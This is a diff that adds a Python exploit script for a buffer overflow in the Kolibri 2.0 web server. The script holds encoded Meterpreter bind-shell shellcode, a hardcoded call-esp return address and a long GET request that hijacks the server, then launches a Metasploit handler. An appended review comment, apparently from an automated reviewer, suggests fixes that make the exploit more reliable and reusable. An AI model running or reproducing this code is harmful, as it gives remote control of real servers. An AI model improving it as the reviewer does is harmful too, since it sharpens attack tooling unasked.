+# Vendor Homepage: http://www.senkas.com/kolibri/download.php
+# Version: Kolibri 2.0
+# Tested on: Windows XP SP3, Spanish
+# Thanks:To my wife for putting up with my possessions
+# Description:
+# A buffer overflow is triggered when a long GET command is sent to the server.
+
+import socket, sys, os, time
+
+if len(sys.argv) != 3:
+ print "[*] Uso: %s \n" % sys.argv[0]
+ print "[*] Exploit created by Polunchis"
+ print "[*] https://www.intrusionlabs.com.mx"
+ sys.exit(0)
+host = sys.argv[1]
+port = int(sys.argv[2])
+
+#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
+shellcode = (
+"\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+"\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
+"\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
+"\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
+"\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
+"\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
+"\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
+"\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
+"\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
+"\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
+"\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
+"\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
+"\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
+"\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
+"\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
+"\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
+"\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
+"\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
+"\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
+"\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
+"\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
+"\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
+)
+
+nop = "A" * 33 + '\x90' * 20
+junk = "C" *(515-(len(nop)+len(shellcode)))
+opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
+eip = '\x63\x46\x92\x7c'
+#7c86467b 7C924663 call esp
+buffer = nop + shellcode + junk + eip + opcode + "B" * 60
+
+req = ("GET /" + buffer + " HTTP/1.1\r\n"
+"Host: " + host + ":" + str(port) + "\r\n"
+"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
+"Connection: keep-alive\r\n\r\n")
+print " [+] Connecting to %s:%d" % (host, port)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+ s.connect((host, port))
+ print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode))
+ s.send(req)
+ data = s.recv(1024)
+ print " [+] Closing connection.."
+ s.close()
+ print "[+] Exploit Sent Successfully"
+ print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
+ print "\r"
+ time.sleep(3)
+ os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
+ print "[-] Connection lost from " + host + ":4444 \r"
+except:
+ print "[-] Could not connect to " + host + ":4444\r"
+ sys.exit(0)
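Review bot: The handler launch `os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")` hardcodes a lab address, so the bind_tcp handler connects to 192.168.0.106 regardless of the `host` given on the command line; build it from the argument instead, `os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=%s LPORT=4444 E" % host)`. The bare `except:` around the whole body reports `Could not connect` for any failure, including the `s.recv(1024)` that is expected to fail once the server has been hijacked or has crashed, and it also swallows `KeyboardInterrupt`; narrowing it to `except socket.error:` and keeping only the connect/send inside the `try` would make the success and failure paths honest. The return address `eip = '\x63\x46\x92\x7c'` is a fixed XP SP3 (Spanish) `call esp` gadget, as the `#7c86467b 7C924663 call esp` comment records, which is fine for this target but should be stated in the header as the reason the exploit is build-specific; the usage string `"[*] Uso: %s \n"` also appears to have lost its `<host> <port>` placeholders (presumably stripped as HTML) and is worth restoring.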